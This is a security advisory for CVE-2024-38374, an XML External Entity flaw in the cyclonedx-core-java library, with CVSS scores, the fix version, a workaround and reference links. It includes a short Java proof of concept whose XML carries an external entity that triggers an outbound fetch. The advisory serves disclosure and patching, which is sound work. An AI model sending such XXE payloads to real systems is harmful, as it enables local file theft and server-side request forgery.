7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.3 High
AI Score
Confidence
Low
0 Low
EPSS
Percentile
0.0%
Before deserializing CycloneDX Bill of Materials in XML format, cyclonedx-core-java leverages XPath expressions to determine the schema version of the BOM. The DocumentBuilderFactory
used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.
XXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.
import org.cyclonedx.parsers.XmlParser;
class Poc {
public static void main(String[] args) {
// Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused
new XmlParser().parse("""
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>
""".getBytes());
}
}
The vulnerability has been fixed in cyclonedx-core-java version 0.9.4.
If feasible, applications can reject XML documents before handing them to cyclonedx-core-java for parsing.
This may be an option if incoming CycloneDX BOMs are known to be in JSON format.
github.com/CycloneDX/cyclonedx-core-java
github.com/CycloneDX/cyclonedx-core-java/pull/434
github.com/CycloneDX/cyclonedx-core-java/pull/434/commits/ab0bc9c530d24f737970dbd0287d1190b129853d
github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8
nvd.nist.gov/vuln/detail/CVE-2024-38374
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.3 High
AI Score
Confidence
Low
0 Low
EPSS
Percentile
0.0%